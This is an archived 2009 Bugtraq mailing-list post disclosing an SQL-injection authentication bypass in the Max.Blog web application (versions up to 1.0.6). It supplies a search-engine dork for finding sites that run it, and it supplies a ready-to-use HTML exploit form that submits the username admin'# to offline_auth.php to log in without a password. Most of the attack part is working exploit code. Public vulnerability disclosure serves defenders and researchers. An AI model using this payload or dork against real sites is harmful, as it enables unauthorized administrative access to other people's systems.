| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <48317b000901271313r3092f7b0pa540daece999172d@mail.gmail.com>
Date: Tue, 27 Jan 2009 22:13:59 +0100
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@...il.com>
To: Bugtraq <bugtraq@...urityfocus.com>
Subject: Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass
################### Salvatore "drosophila" Fresta ###################
Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug: * Offline Authentication Bypass
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date: 27 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@...il.com
############################################################################
- BUGS
Offline Authentication Bypass Exploit:
Requisites: magic quotes = off
File affected: offline_auth.php
This bug allows a guest to bypass an offline authentication service
using SQL Injection vulnerability.
############################################################################
- CODE
<html>
<head>
<title>
Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 Offline
Authentication Bypass Exploit
</title>
</head>
<body>
<form action="http://www.site.com/path/offline_auth.php" method="POST">
<input type="text" name="username" value="admin'#" size="15">
<input type="hidden" name="password">
<input type="submit" value="Go!">
</form>
</body>
</html>
############################################################################
--
Salvatore "drosophila" Fresta
CWNP444351
Powered by blists - more mailing lists